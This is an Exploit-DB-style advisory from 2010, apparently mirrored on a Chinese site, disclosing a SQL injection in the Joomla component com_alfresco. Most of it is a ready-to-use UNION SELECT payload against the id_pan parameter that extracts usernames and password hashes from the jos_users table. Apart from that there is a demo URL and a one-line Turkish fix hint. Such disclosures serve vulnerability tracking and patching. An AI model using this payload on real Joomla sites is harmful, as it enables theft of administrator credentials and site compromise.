Joomla! Component com_alfresco – SQL Injection

  • 作者: FL0RiX
    日期: 2010-01-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/10952/
  • <------------------- header data start ------------------- >
    
    #############################################################
    #Joomla Component com_alfresco SQL Injection Vulnerability
    #############################################################
    
    # Author: FL0RiX
    
    # Name: com_alfresco
    
    # Greez : PyskE,Dr.Kacak And All Friends
    
    # Bug Type: SQL Injection
    
    # Infection : Admin login bilgileri alinabilir.
    
    # Demo Vuln.:
    
    http://server/index.php?option=com_alfresco&task=edit&id_pan=[SQL INJ.]
    
    # Bug Fix Advice : Zararli karakterler filtrelenmelidir.
    
    #############################################################
    
    < ------------------- header data end of ------------------- >
    
    < -- bug code start -- >
    
    path/index.php?option=com_alfresco&task=edit&id_pan=null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixf0r3v3r,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/jos_users--
    
    < -- bug code end of -- >